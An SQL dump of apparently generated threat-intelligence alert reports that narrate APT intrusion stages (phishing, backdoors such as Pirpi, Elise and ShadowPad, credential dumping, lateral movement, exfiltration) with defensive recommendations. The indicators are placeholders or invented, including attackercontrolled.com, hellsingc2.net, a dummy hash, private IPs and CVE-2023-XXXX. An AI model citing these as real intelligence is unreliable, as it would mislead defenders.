(689, 139, 1217, 3, 'Pirpi Backdoor Installation Details', '## Overview\n\nThe persistence stage of the attack was marked by the installation of the Pirpi backdoor. This malware is critical for maintaining access to compromised systems.\n\n## Technical Details\n\n- **Installation Method**: Installed as a service, ensuring it runs with system privileges.\n- **Capabilities**: Allows remote command execution, file transfers, and further malware deployment.\n\n## Impact\n\nWith the backdoor installed, the attackers can now attempt to access credentials, escalating their control over the network infrastructure.', '2026-02-07 21:28:29'),
(690, 139, 1218, 4, 'Credential Access and Exfiltration Preparation', '## Overview\n\nFollowing the detection of unauthorized credential access, it is crucial to understand the attackers\' motives and methods for exfiltrating sensitive information.\n\n## Observations\n\n- **Credential Harvesting**: Attackers used the Pirpi backdoor to capture login credentials from memory.\n- **Targeted Accounts**: Focus on administrative and high-privilege accounts.\n\n## Next Stage\n\nThe attackers are likely preparing for large-scale data exfiltration using encrypted channels to avoid detection. Monitoring for unusual network activities is essential to mitigate further risks.', '2026-02-07 21:28:29'),
(691, 139, 1219, 5, NULL, NULL, '2026-02-07 21:28:29'),
(692, 140, 1220, 1, 'Phishing Campaign Analysis', '### Overview\nThe initial access vector leveraged by APT3 involves a sophisticated phishing campaign targeting key personnel within organizations. The emails are highly tailored, often using spear-phishing techniques to increase the likelihood of success.\n\n### Key Indicators\n- **Email Subjects:** Typically reference urgent business matters or IT notifications.\n- **Attachments:** Microsoft Word documents or PDFs containing embedded malicious scripts.\n\n### Recommendations\n- Implement advanced email filtering solutions.\n- Conduct employee awareness training sessions focusing on phishing detection.\n\n### Next Steps\nPrepare for potential exploitation attempts, as this report indicates a successful initial access attempt.', '2026-02-07 21:28:52'),
(693, 140, 1221, 2, 'Exploit Code Execution Details', '### Overview\nAPT3 has executed exploit code targeting the Adobe Flash Zero-Day vulnerability, CVE-2015-3113. This vulnerability allows remote code execution on vulnerable systems.\n\n### Technical Details\n- **Vulnerability:** CVE-2015-3113\n- **Affected Systems:** Adobe Flash Player versions prior to 18.0.0.194.\n- **Exploit Delivery:** Often delivered through compromised web pages or malicious email attachments.\n\n### Mitigation Strategies\n- Ensure all systems are updated to the latest version of Adobe Flash Player.\n- Deploy intrusion detection systems to monitor for exploit signatures.\n\n### Next Steps\nExpect APT3 to establish persistence mechanisms following successful exploitation.', '2026-02-07 21:28:52'),
(694, 140, 1222, 3, 'Persistence Mechanisms Employed', '### Overview\nFollowing the successful execution of exploit code, APT3 establishes persistence within the compromised network. This involves deploying a custom backdoor that allows continuous access to the target.\n\n### Backdoor Characteristics\n- **File Name:** Varies per deployment, often masquerading as legitimate system files.\n- **Communication Protocols:** Utilizes HTTP or HTTPS to communicate with command-and-control (C2) servers.\n\n### Detection and Response\n- Conduct regular checks for unauthorized system modifications.\n- Implement endpoint detection and response (EDR) solutions to identify unusual behaviors.\n\n### Next Steps\nPrepare for possible lateral movement activities as APT3 attempts to expand its foothold within the network.', '2026-02-07 21:28:52'),
(695, 140, 1223, 4, 'Credential Compromise and Lateral Movement', '### Overview\nAPT3 engages in lateral movement using stolen credentials obtained from compromised systems. This phase of the operation aims to escalate privileges and access sensitive data across the network.\n\n### Techniques Used\n- **Credential Dumping:** Tools like Mimikatz used to extract credentials from memory.\n- **Pass-the-Hash:** Exploiting NTLM hashes to authenticate without knowing the actual password.\n\n### Defensive Measures\n- Enforce multi-factor authentication (MFA) across all critical systems.\n- Regularly audit and rotate privileged account credentials.\n\n### Next Steps\nAnticipate data exfiltration attempts as APT3 seeks to extract valuable information from the network.', '2026-02-07 21:28:52'),
(696, 140, 1224, 5, NULL, NULL, '2026-02-07 21:28:52'),
(697, 141, 1225, 1, 'Analysis of Unusual Flash Script Execution', '## Contextual Overview\nFollowing the detection of a suspicious Flash exploit, our team has observed **unusual execution patterns** of Flash scripts across several endpoints. This activity indicates a potential exploitation chain in progress.\n\n## Key Findings\n- **Execution Vector**: The Flash script seems to be leveraging a zero-day vulnerability to initiate execution without user interaction.\n- **Network Activity**: Unusual outbound traffic was detected, possibly linked to command and control (C2) communications.\n\n## Recommendations\n- **Immediate Mitigation**: Isolate affected systems and initiate a detailed forensic analysis to understand the full scope of the execution.\n- **Update Policies**: Apply strict execution policies to limit script activities and monitor for similar patterns in other systems.', '2026-02-07 21:29:13'),
(698, 141, 1226, 2, 'Pirpi Malware Persistence Mechanism Uncovered', '## Contextual Overview\nSubsequent to the unusual Flash script execution, forensic analysis has identified the deployment of **Pirpi malware**. This malware is known for its sophisticated persistence mechanisms.\n\n## Key Findings\n- **Persistence Techniques**: The malware employs registry manipulation and scheduled tasks to maintain persistence even after system reboots.\n- **File Artifacts**: Several suspicious DLL files have been identified in system directories, supporting the persistence of Pirpi.\n\n## Recommendations\n- **Containment Measures**: Remove identified persistence mechanisms and scan for additional instances of Pirpi across the network.\n- **System Hardening**: Implement advanced endpoint security measures and regular audits to detect persistence anomalies.', '2026-02-07 21:29:13'),
(699, 141, 1227, 3, 'Investigation of Lateral Movement via Windows Exploit', '## Contextual Overview\nIn the aftermath of discovering Pirpi’s persistence, our team has detected **lateral movement** activities utilizing a Windows zero-day exploit. This points towards an effort to spread within the network.\n\n## Key Findings\n- **Movement Tactics**: The adversary is exploiting a vulnerability in Windows to gain higher privileges and move laterally across systems.\n- **Compromised Accounts**: Several user accounts have shown unauthorized access patterns, likely used to facilitate lateral movement.\n\n## Recommendations\n- **Access Control**: Reset credentials of compromised accounts and enforce multi-factor authentication (MFA) across the domain.\n- **Patch Management**: Prioritize patching of the identified Windows vulnerability and enhance monitoring of lateral movement indicators.', '2026-02-07 21:29:13'),
(700, 141, 1228, 4, 'Data Exfiltration Pathways and Mitigation Strategies', '## Contextual Overview\nFollowing the lateral movement detection, evidence points to **data exfiltration** activities aimed at siphoning sensitive information from compromised systems.\n\n## Key Findings\n- **Exfiltration Channels**: Data is being exfiltrated via encrypted channels, likely leveraging HTTPS or DNS tunneling.\n- **Targeted Data**: Preliminary analysis suggests that sensitive corporate and personal data are being targeted for extraction.\n\n## Recommendations\n- **Data Loss Prevention (DLP)**: Deploy DLP solutions to monitor and block unauthorized data transfers.\n- **Traffic Analysis**: Conduct a thorough review of outbound traffic logs to identify and block exfiltration attempts.\n- **Incident Response**: Engage incident response teams to assess the full impact and coordinate a strategic recovery plan.', '2026-02-07 21:29:13'),
(701, 141, 1229, 5, NULL, NULL, '2026-02-07 21:29:13'),
(702, 142, 1230, 1, 'Elise Backdoor Activation Analysis', '## Overview\nAfter identifying the spear phishing email with a malicious attachment, further investigation revealed the activation of the Elise backdoor. This sophisticated malware is known for its stealth and effectiveness in gaining unauthorized access to targeted systems.\n\n## Key Findings\n- **Target Scope**: The backdoor was programmed to activate upon opening the malicious attachment, specifically targeting military personnel.\n- **Activation Method**: Utilizes a hidden script within the attachment that executes upon opening.\n- **Initial Indicators**: Sudden outbound communication to known command and control (C2) servers linked to Lotus Blossom.\n\n## Next Steps\nPrepare for detection of persistence mechanisms as the adversary seeks to maintain access.', '2026-02-07 21:48:01'),
(703, 142, 1231, 2, 'Persistence Mechanisms Identified', '## Overview\nFollowing the execution of the Elise backdoor, our team has successfully identified the persistence mechanisms employed by the threat actors. Understanding these methods is critical for preventing further unauthorized access.\n\n## Key Findings\n- **Registry Modifications**: Alterations made to the Windows Registry to ensure the backdoor loads upon system startup.\n- **Service Creation**: New services created, disguised as legitimate system processes, to maintain active connections to C2 infrastructure.\n- **Scheduled Tasks**: Task Scheduler used to periodically execute scripts that check for backdoor updates.\n\n## Recommendations\nFocus on monitoring internal network traffic for signs of lateral movement as the adversary attempts to expand their foothold.', '2026-02-07 21:48:01'),
(704, 142, 1232, 3, 'Lateral Movement Detection and Analysis', '## Overview\nIn response to the established persistence mechanisms, activity indicating lateral movement within the network has been detected. This step involves the threat actors exploring and expanding their access across the network.\n\n## Key Findings\n- **Internal Scanning**: Use of tools to identify and map the internal network, searching for vulnerable systems and credentials.\n- **Credential Harvesting**: Capturing of administrative credentials through keylogging and memory scraping techniques.\n- **Remote Execution**: Deployment of the Elise backdoor to additional systems to widen the attack surface.\n\n## Strategic Actions\nImplement enhanced monitoring on critical data storage systems to prepare for potential data exfiltration activities.', '2026-02-07 21:48:01'),
(705, 142, 1233, 4, 'Data Exfiltration via Encrypted Channels', '## Overview\nThe culmination of the espionage campaign involves the exfiltration of sensitive data, which is a crucial phase for the threat actors. Observations confirm the use of encrypted channels to obfuscate data transfer activities.\n\n## Key Findings\n- **Encryption Use**: Data packets are encrypted before transmission, making detection through traditional monitoring methods challenging.\n- **C2 Communication**: Increased communication frequency with external servers, suggesting active data transfer operations.\n- **Exfiltration Targets**: Primarily focused on acquiring classified military documents and personnel records.\n\n## Countermeasures\nDeploy advanced threat detection tools capable of analyzing encrypted traffic patterns and conduct a comprehensive audit of sensitive data access logs.', '2026-02-07 21:48:01'),
(706, 142, 1234, 5, NULL, NULL, '2026-02-07 21:48:01'),
(707, 143, 1235, 1, 'Analysis of Initial Access via Phishing', '### Overview\nAfter the initial alert regarding the phishing email targeting Naikon, further analysis reveals the use of a spear-phishing campaign. The email spoofed a known contact and contained a malicious Word document. Upon opening, a macro executed, leading to the download of additional payloads.\n\n### Indicators of Compromise (IoCs)\n- **Email Subject:** \"Urgent: Updated Protocols\"\n- **Sender Address:** spoofed@contact.com\n- **Attachment Name:** \"Protocols.docx\"\n- **Domain:** attackercontrolled.com\n\n### Next Steps\nInvestigators should focus on identifying the payload downloaded by the macro and any secondary actions triggered by the document. This will provide insight into the vulnerabilities targeted during execution.', '2026-02-07 21:48:07');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(708, 143, 1236, 2, 'Exploitation of Office Vulnerability', '### Overview\nFollowing the phishing incident, further investigation has confirmed that the malicious document exploited a known vulnerability in Microsoft Office. This vulnerability allowed remote code execution, providing attackers with the ability to execute arbitrary commands on the compromised system.\n\n### Technical Details\n- **CVE Identifier:** CVE-2023-XXXX\n- **Vulnerability Type:** Remote Code Execution (RCE)\n- **Patch Status:** Unpatched systems are vulnerable\n\n### Recommendations\n- Ensure all Office software is updated with the latest security patches.\n- Conduct scans to identify other potentially vulnerable systems within the network.\n\n### Next Steps\nThe focus should now shift to identifying how the attackers maintain persistence and what backdoor mechanisms have been employed.', '2026-02-07 21:48:07'),
(709, 143, 1237, 3, 'Establishment of Backdoor Persistence', '### Overview\nAnalysis indicates that the threat actors have established persistence through a custom backdoor known to be used by the Hellsing group. This backdoor allows continued remote access to compromised systems, facilitating further exploitation and data exfiltration.\n\n### Backdoor Characteristics\n- **Backdoor Name:** HellsBackdoor\n- **Communication Protocol:** Encrypted HTTP/S\n- **C2 Servers:** identified at hellsingc2.net\n\n### Mitigation Strategies\n- Deploy network monitoring to identify unusual outbound traffic.\n- Isolate compromised systems to prevent lateral movement.\n\n### Next Steps\nInvestigators should focus on identifying lateral movement within the network, specifically looking for signs of credential dumping and privilege escalation.', '2026-02-07 21:48:07'),
(710, 143, 1238, 4, 'Credential Dumping and Lateral Movement Analysis', '### Overview\nEvidence has surfaced that the Hellsing group has successfully performed credential dumping on targeted systems. Utilizing stolen credentials, they achieved lateral movement across the network, elevating privileges and accessing sensitive data.\n\n### Tools and Techniques\n- **Credential Dumping Tool:** Mimikatz\n- **Privilege Escalation Method:** Pass-the-Hash\n- **Targeted Systems:** Domain Controllers, Email Servers\n\n### Recommendations\n- Implement multi-factor authentication (MFA) to mitigate the risk of credential reuse.\n- Monitor for anomalous login attempts and access patterns.\n\n### Next Steps\nAttention must be directed towards potential data exfiltration activities, including monitoring for unauthorized data transfers to external servers.', '2026-02-07 21:48:07'),
(711, 143, 1239, 5, NULL, NULL, '2026-02-07 21:48:07'),
(712, 144, 1240, 1, 'Analysis of the Phishing Attack Vector', '### Overview\nFollowing the detection of suspicious email infiltration, further analysis was conducted on the phishing attack vector used by Tropic Trooper. The emails were crafted with high specificity, targeting key personnel within the military and government sectors of Taiwan and the Philippines.\n\n### Technical Details\n- **Email Headers:** Analysis of email headers revealed spoofed sender addresses mimicking legitimate government entities.\n- **Payload:** Attached documents contained malicious macros that, when enabled, initiated the download of additional malware.\n- **Targets:** Specifically aimed at individuals involved in defense strategy and policy planning.\n\n### Recommendations\n1. **Enhanced Email Filtering:** Implement advanced filtering techniques to identify and quarantine suspicious emails.\n2. **User Training:** Conduct security awareness training focusing on phishing attack recognition.\n\nThis report provides context for the next alert, anticipating potential malware execution on compromised systems.', '2026-02-07 21:48:09'),
(713, 144, 1241, 2, 'Investigation into Malware Execution on Compromised Systems', '### Overview\nUpon execution of the malicious payload from the phishing attack, our systems detected the deployment of malware across compromised networks. This report delves into the characteristics of the malware used by Tropic Trooper.\n\n### Malware Characteristics\n- **Type:** The malware is identified as a variant of the \"Yahoyah\" trojan, custom-modified for stealth and persistence.\n- **Capabilities:** It can perform keylogging, screen capturing, and remote command execution.\n- **Propagation:** Utilizes lateral movement techniques to spread across connected systems.\n\n### Mitigation Measures\n1. **Isolation Protocols:** Immediately isolate infected machines from the network.\n2. **Network Monitoring:** Enhance network traffic monitoring to detect abnormal activities.\n\nThis report sets the stage for understanding the subsequent alert concerning data exfiltration via unusual network traffic.', '2026-02-07 21:48:09'),
(714, 144, 1242, 3, NULL, NULL, '2026-02-07 21:48:09'),
(715, 145, 1243, 1, 'Analysis of ShadowPad Backdoor Deployment', '### Overview\nFollowing the initial access via the phishing email, intelligence has identified the deployment of the ShadowPad backdoor. This malware is known for its modular architecture and ability to evade detection.\n\n### Technical Details\n- **Entry Point:** The phishing email contained a malicious attachment that executed a script to download ShadowPad.\n- **Behavior:** Once executed, ShadowPad establishes a persistent connection to a command and control server, allowing remote access to the compromised system.\n\n### Insight\nIt is crucial to monitor network traffic for connections to known ShadowPad C2 servers to detect and mitigate the threat early.\n\n### Next Steps\nPrepare for potential persistence mechanisms that may be deployed to maintain access.', '2026-02-07 21:48:51'),
(716, 145, 1244, 2, 'Scheduled Task: Persistence Mechanism Insight', '### Overview\nAfter executing the ShadowPad backdoor, adversaries are likely to establish persistence to ensure continued access to the compromised system.\n\n### Key Observations\n- **Method Used:** A scheduled task has been created to execute the ShadowPad malware at regular intervals.\n- **Detection:** Look for unusual scheduled tasks, especially those executing binaries from uncommon locations.\n\n### Insight\nUnderstanding the persistence mechanism helps in developing strategies to neutralize the threat, such as auditing and removing unauthorized scheduled tasks.\n\n### Next Steps\nAnticipate lateral movement attempts which may involve credential dumping techniques.', '2026-02-07 21:48:51'),
(717, 145, 1245, 3, 'Credential Dumping with Cobalt Strike', '### Overview\nWith persistence established, the operation is now advancing to lateral movement, facilitated by Cobalt Strike\'s capabilities.\n\n### Technical Details\n- **Objective:** Obtain credentials to access other network systems.\n- **Tools Used:** Cobalt Strike, known for its powerful credential harvesting features.\n\n### Insight\nCredential dumping poses a significant risk as it can lead to further system compromises. Monitoring for unusual authentication patterns is essential.\n\n### Next Steps\nPrepare defenses against potential data exfiltration by enhancing network monitoring and data loss prevention measures.', '2026-02-07 21:48:51'),
(718, 145, 1246, 4, 'Data Exfiltration Tactics and Mitigation', '### Overview\nThe final stage of the operation involves the exfiltration of sensitive data, potentially impacting governmental entities significantly.\n\n### Observed Methods\n- **Data Exfiltration Channels:** Use of encrypted channels to mask data transfer.\n- **Targets:** Sensitive files and databases identified during the lateral movement stage.\n\n### Insight\nUnderstanding and disrupting data exfiltration channels is critical to safeguarding sensitive information. Implementing strict network egress controls can help detect and prevent unauthorized data transfers.\n\n### Conclusion\nBy analyzing each step of the attack chain, defenses can be strengthened to prevent future intrusions and protect critical data assets.', '2026-02-07 21:48:51'),
(719, 145, 1247, 5, NULL, NULL, '2026-02-07 21:48:51'),
(720, 146, 1275, 1, 'Investigation into Malicious RTF Attachment', '### Report on Suspicious Email\n\n**Details:**\nThe suspicious email was identified as a phishing attempt containing a malicious RTF attachment. The attachment exploits vulnerabilities to execute arbitrary code on the target\'s system. The email was crafted to appear as an official communication from a trusted source within the Southeast Asian government sector.\n\n**Indicators of Compromise (IOCs):**\n- **Email Subject:** \"Urgent Document Review\"\n- **Sender Address:** spoofed@trustedsource.gov\n- **Attachment Name:** document_review.rtf\n\n**Next Steps:**\n- Conduct a deeper analysis of the malicious payload executed via the Soul Framework to understand its capabilities and objectives.', '2026-02-24 03:13:51'),
(721, 146, 1276, 2, 'Analysis of Soul Framework Execution', '### Report on Malware Execution\n\n**Details:**\nThe Soul Framework was executed after the malicious RTF attachment was opened by the target. This framework is known for its modular architecture, which allows attackers to deploy various modules for different purposes, including reconnaissance, data collection, and command-and-control operations.\n\n**Technical Analysis:**\n- The payload establishes a connection with a command-and-control server to receive further instructions.\n- Modules observed include system information collection and credential theft.\n\n**Next Steps:**\n- Monitor for registry modifications to identify persistence mechanisms employed by the attackers.', '2026-02-24 03:13:51'),
(722, 146, 1277, 3, 'Registry Modification Persistence Mechanism', '### Report on Persistence Mechanism\n\n**Details:**\nThe attackers have modified system registry keys to ensure the persistence of their malware on the compromised system. By establishing persistence, the threat actors can maintain access to the system even after a reboot.\n\n**Technical Analysis:**\n- Registry keys modified to include malicious scripts that execute on startup.\n- Persistence techniques observed include Run keys and Scheduled Tasks.\n\n**Next Steps:**\n- Investigate unauthorized access to internal systems as attackers may be attempting lateral movement.', '2026-02-24 03:13:51'),
(723, 146, 1278, 4, 'Unauthorized Access and Lateral Movement', '### Report on Unauthorized Access\n\n**Details:**\nEvidence suggests that the attackers have gained unauthorized access to sensitive internal systems. This indicates a successful lateral movement from the initially compromised host, possibly through stolen credentials.\n\n**Technical Analysis:**\n- Unusual login attempts from compromised accounts detected across multiple systems.\n- Network traffic analysis shows connections to sensitive databases and file servers.\n\n**Next Steps:**\n- Monitor network traffic for data exfiltration attempts, particularly through encrypted channels.', '2026-02-24 03:13:51'),
(724, 146, 1279, 5, NULL, NULL, '2026-02-24 03:13:51'),
(725, 147, 1280, 1, 'Analysis of Phishing Tactics', '### Overview\nFollowing the detection of a phishing email targeting Uyghur and Tibetan activists, this report delves into the tactics used by Scarlet Mimic to gain initial access.\n\n### Phishing Strategy\nScarlet Mimic employs highly personalized spear-phishing campaigns, often mimicking trusted contacts of the targets. These emails typically contain malicious attachments or links designed to deploy the FakeM malware.\n\n### Recommendations\n- **Educate:** Conduct awareness training for activists on identifying phishing attempts.\n- **Filter Implementation:** Enhance email filtering to detect and quarantine suspicious emails.\n\n### Implications\nThe successful execution of the phishing campaign paves the way for malware deployment, emphasizing the need for proactive email security measures.', '2026-02-24 03:14:16'),
(726, 147, 1281, 2, 'FakeM Malware Execution Analysis', '### Overview\nPost-phishing detection, the FakeM malware has been activated on targeted devices. This report examines the malware\'s execution process and its immediate impact.\n\n### Malware Capabilities\nFakeM enables remote access to compromised systems, allowing attackers to monitor activities and exfiltrate sensitive information. It is designed to operate stealthily, minimizing detection.\n\n### Indicators of Compromise (IoCs)\n- **File Paths:** Unusual executable files in user directories.\n- **System Anomalies:** Unexpected processes and network connections.\n\n### Next Steps\nThe activation of FakeM sets the stage for persistent system compromise through registry modifications.', '2026-02-24 03:14:16'),
(727, 147, 1282, 3, 'Registry Modification and Persistence Mechanisms', '### Overview\nFollowing the execution of FakeM, registry modifications have been detected, indicating attempts to establish persistence on infected systems.\n\n### Technical Details\nThe malware modifies registry keys to ensure it runs every time the system starts, making removal difficult without specialized tools.\n\n### Detection and Response\n- **Registry Monitoring:** Implement continuous monitoring for unauthorized changes.\n- **System Audits:** Conduct regular audits to identify and mitigate persistence mechanisms.\n\n### Implications\nThis persistence mechanism allows Scarlet Mimic to maintain long-term access to compromised systems, facilitating further network intrusion activities.', '2026-02-24 03:14:16'),
(728, 147, 1283, 4, 'Unauthorized Network Access and Lateral Movement', '### Overview\nThe persistence of FakeM has allowed Scarlet Mimic to gain unauthorized access to internal networks, highlighting a critical phase of lateral movement.\n\n### Attack Progression\nThe attackers use stolen credentials and exploit vulnerabilities to move laterally within the network, targeting additional systems and expanding their foothold.\n\n### Mitigation Strategies\n- **Access Controls:** Implement strict access controls and network segmentation.\n- **Vulnerability Management:** Regularly update and patch systems to close security gaps.\n\n### Implications\nLateral movement increases the risk of widespread data exfiltration, necessitating urgent measures to prevent sensitive information from being transferred to external servers.', '2026-02-24 03:14:16'),
(729, 147, 1284, 5, NULL, NULL, '2026-02-24 03:14:16'),
(730, 148, 1285, 1, 'Analysis of Spear Phishing Techniques', '### Spear Phishing Campaign Detected\n\nFollowing the detection of a spear phishing campaign targeting Ukrainian activists and separatists, a detailed analysis was conducted to understand the methods used by the threat actors. The phishing emails were crafted with high precision, utilizing subject lines relevant to ongoing regional issues. Attachments and links contained in these emails were embedded with malicious scripts designed to deploy malware upon interaction. This initial phase of the Groundbait campaign aimed to compromise targets by exploiting human factors and leveraging trust within activist networks.', '2026-02-24 03:14:42'),
(731, 148, 1286, 2, 'Deployment of Remote Access Trojans', '### Remote Access Trojan Execution\n\nAfter successful phishing attacks, Remote Access Trojans (RATs) were deployed on compromised systems. These RATs provided the attackers with the capability to remotely control the infected machines, executing commands and gathering intelligence on victim activities. The RATs were observed to utilize common communication protocols to blend in with normal network traffic, reducing the chance of detection. This stage was crucial for establishing a foothold within target networks and set the stage for further exploitation and persistence.', '2026-02-24 03:14:42'),
(732, 148, 1287, 3, 'Persistence Mechanisms via Registry Modifications', '### Establishing Persistence with Registry Modifications\n\nTo ensure long-term access to compromised systems, the attackers employed registry modifications as a persistence mechanism. By altering registry keys, the RATs were configured to execute upon system startup, ensuring continued control even after system reboots. This method of persistence is indicative of the attackers\' intent to maintain an enduring presence in the target environment, allowing for ongoing intelligence gathering and potential future operations.', '2026-02-24 03:14:42'),
(733, 148, 1288, 4, 'Credential Dumping for Lateral Movement', '### Credential Dumping for Lateral Movement\n\nIn preparation for lateral movement within targeted networks, attackers engaged in credential dumping activities. By extracting sensitive authentication data from compromised systems, they aimed to escalate privileges and access additional resources. This stage involved the use of tools designed to obtain passwords and hashes from memory, databases, and other system locations. The ability to move laterally was critical for expanding their reach and accessing valuable information across the network.', '2026-02-24 03:14:42'),
(734, 148, 1289, 5, NULL, NULL, '2026-02-24 03:14:42'),
(735, 149, 1290, 1, 'Unauthorized Access Details and Indicators', '# Unauthorized Access Detected\n\n## Summary\nFollowing the initial alert of unauthorized access within Ukrainian infrastructure, analysis indicates the exploitation of a known vulnerability in the remote access software commonly used by targeted organizations. This unauthorized access is suspected to be the entry point used by the Advanced Persistent Threat (APT) group.\n\n## Indicators of Compromise (IoCs)\n- **IP Addresses:** 192.168.1.10, 192.168.1.15\n- **Malicious URLs:** `http://malicious-site.example.com`\n- **Compromised Systems:** Domain controllers and administrative workstations\n\n## Implications\nThe initial access achieved by the APT group is critical in understanding their foothold and potential intent to carry out further activities, including surveillance and data exfiltration.', '2026-02-24 03:15:13'),
(736, 149, 1291, 2, 'Analysis of Suspicious PowerShell Script Execution', '# Suspicious PowerShell Activity\n\n## Summary\nPost the detection of unauthorized access, a suspicious PowerShell script was executed on multiple compromised systems. This script is designed to download additional payloads and establish connections to command and control (C2) servers.\n\n## Technical Details\n- **Script Functionality:** Downloads and executes additional malware components\n- **C2 Communication:** Utilizes HTTPS for encrypted communication\n- **Script Hash:** `abcd1234efgh5678ijkl9012mnop3456`\n\n## Recommendations\nImmediate containment of affected systems is recommended. Network traffic to the identified C2 infrastructure should be monitored and blocked to prevent further command execution and data exfiltration.', '2026-02-24 03:15:13'),
(737, 149, 1292, 3, 'Persistence Mechanism via Registry Modification', '# Persistence Mechanism Established\n\n## Summary\nFurther investigation reveals that the APT group has established a persistence mechanism through registry modifications. This allows them to maintain access to the compromised systems even after reboots.\n\n## Technical Details\n- **Registry Key:** `HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MaliciousScript`\n- **Payload:** Malicious script set to execute on startup\n- **Stealth Techniques:** Obfuscation of registry entries to avoid detection\n\n## Impact\nThis persistence mechanism ensures long-term access for the APT group, enabling ongoing surveillance and data collection activities. Immediate remediation is necessary to remove unauthorized registry entries and prevent further exploitation.', '2026-02-24 03:15:13'),
(738, 149, 1293, 4, 'Lateral Movement Tactics and Techniques', '# Lateral Movement Across Network\n\n## Summary\nThe APT group has successfully moved laterally across the network, compromising additional systems. This movement is facilitated through the use of stolen credentials and exploitation of trust relationships between systems.\n\n## Techniques Observed\n- **Credential Dumping:** Harvesting of credentials from memory\n- **Pass-the-Hash:** Using hashed credentials to access other systems\n- **Remote Desktop Protocol (RDP):** Used for remote access to compromised systems\n\n## Countermeasures\nNetwork segmentation and strict access controls are recommended to limit the ability of attackers to move laterally. Enhanced monitoring of privileged account activity is also advised to detect and respond to suspicious actions.', '2026-02-24 03:15:13'),
(739, 149, 1294, 5, NULL, NULL, '2026-02-24 03:15:13'),
(740, 150, 1295, 1, 'Insights into Template Injection Tactics', '### Overview\nFollowing the detection of suspicious email delivery, further analysis reveals Gamaredon\'s use of advanced template injection techniques. This method involves embedding malicious code into legitimate document templates, a tactic aimed at bypassing security filters.\n\n### Key Observations\n- **Infection Vectors**: The group exploits common document formats, such as Word and Excel, to deliver payloads.\n- **Code Analysis**: The injected code often initiates a command to download additional malware from remote servers.\n\n### Implications\nUnderstanding the intricacies of template injection is crucial for developing countermeasures to prevent further infiltration.', '2026-02-24 03:16:14'),
(741, 150, 1296, 2, 'Analysis of Backdoor Installation Techniques', '### Overview\nUpon identification of template injection, the next phase involves establishing persistence through backdoor installation. This step is critical as it allows Gamaredon to maintain long-term access to compromised systems.\n\n### Key Observations\n- **Backdoor Methods**: Utilization of custom-developed malware families, often disguised as legitimate software.\n- **Persistence Techniques**: Use of registry modifications and scheduled tasks to ensure the backdoor remains active.\n\n### Mitigation Strategies\nImplementing robust endpoint detection and response solutions can help in identifying and neutralizing these backdoor installations.', '2026-02-24 03:16:14'),
(742, 150, 1297, 3, 'Credential Harvesting Strategies Uncovered', '### Overview\nThe backdoor installations facilitate credential harvesting, allowing Gamaredon to gain access to sensitive information and further infiltrate networks.\n\n### Key Observations\n- **Targeted Credentials**: Focus on administrative accounts that provide broader access to systems.\n- **Harvesting Tools**: Use of both custom and publicly available tools to extract credentials.\n\n### Recommendations\nEnhancing password policies and implementing multi-factor authentication can significantly reduce the risk of credential compromise.', '2026-02-24 03:16:14'),
(743, 150, 1298, 4, 'Lateral Movement Techniques in Gamaredon\'s Playbook', '### Overview\nWith credentials in hand, Gamaredon initiates lateral movement to escalate privileges and compromise additional systems within the network.\n\n### Key Observations\n- **Movement Tactics**: Leveraging legitimate administrative tools such as PowerShell and PsExec.\n- **Network Reconnaissance**: Identification of high-value targets by scanning internal networks.\n\n### Defense Measures\nNetwork segmentation and continuous monitoring are essential in detecting and halting lateral movement attempts.', '2026-02-24 03:16:14'),
(744, 150, 1299, 5, 'Data Exfiltration Methods and Prevention', '### Overview\nThe penultimate step involves the exfiltration of valuable data, often the primary objective of Gamaredon\'s campaigns.\n\n### Key Observations\n- **Exfiltration Techniques**: Use of encrypted channels and cloud storage services to smuggle out data without detection.\n- **Targeted Data**: Focus on national security information and confidential government communications.\n\n### Prevention Strategies\nDeploying data loss prevention systems and monitoring outbound traffic can help identify and block exfiltration attempts.', '2026-02-24 03:16:14'),
(745, 150, 1300, 6, 'Attribution Analysis: Links to Russian Security Services', '### Overview\nThe final phase of the operation examines potential ties between Gamaredon and Russian security services, providing insight into the campaign\'s broader geopolitical implications.\n\n### Key Observations\n- **Evidence of Collaboration**: Overlapping infrastructure and techniques with known Russian state-sponsored groups.\n- **Strategic Objectives**: Alignment with Russian geopolitical goals, particularly concerning Ukraine.\n\n### Conclusion\nAttribution remains a complex challenge; however, the growing body of evidence suggests a coordinated effort between Gamaredon and Russian state entities.', '2026-02-24 03:16:14'),
(746, 150, 1301, 7, NULL, NULL, '2026-02-24 03:16:14'),
(747, 152, 1322, 1, 'Analysis of Initial Access Tactics by Moses Staff', '# Analysis of Initial Access Tactics by Moses Staff\n\n## Overview\nFollowing the detection of the phishing campaign targeting Israeli entities, further analysis has been conducted to understand the tactics, techniques, and procedures (TTPs) employed by Moses Staff.\n\n## Phishing Campaign Insights\n- **Targeted Entities**: Government agencies, critical infrastructure, and private sector organizations.\n- **Phishing Techniques**: Use of spear-phishing emails with malicious attachments or links.\n- **Email Themes**: Often leverage geopolitical tensions, masquerading as official communications or urgent requests.\n\n## Recommendations\n- **Awareness Training**: Enhance phishing awareness training for all employees.\n- **Email Filtering**: Implement advanced email filtering solutions to detect and block phishing attempts.\n\n## Next Steps\nPrepare for potential malware deployment as the threat actors may leverage initial access for executing payloads like the DCSrv wiper.', '2026-03-01 22:55:52'),
(748, 152, 1323, 2, 'DCSrv Wiper Deployment and Impact Analysis', '# DCSrv Wiper Deployment and Impact Analysis\n\n## Overview\nIn the wake of the successful initial access, Moses Staff has deployed the DCSrv wiper, aiming to disrupt operations within targeted Israeli organizations.\n\n## Malware Execution Details\n- **Wiper Characteristics**: The DCSrv wiper is designed to overwrite critical system files, rendering systems inoperable.\n- **Deployment Method**: Likely deployed via compromised systems accessed through phishing.\n- **Impact**: Significant operational disruption, data loss, and potential reputational damage.\n\n## Mitigation Strategies\n- **Regular Backups**: Ensure regular data backups to facilitate quick recovery.\n- **Endpoint Protection**: Deploy robust endpoint protection solutions to detect and prevent malware execution.\n\n## Next Steps\nAnticipate potential data exfiltration activities and prepare defenses to secure sensitive information from being leaked.', '2026-03-01 22:55:52'),
(749, 152, 1324, 3, NULL, NULL, '2026-03-01 22:55:52'),
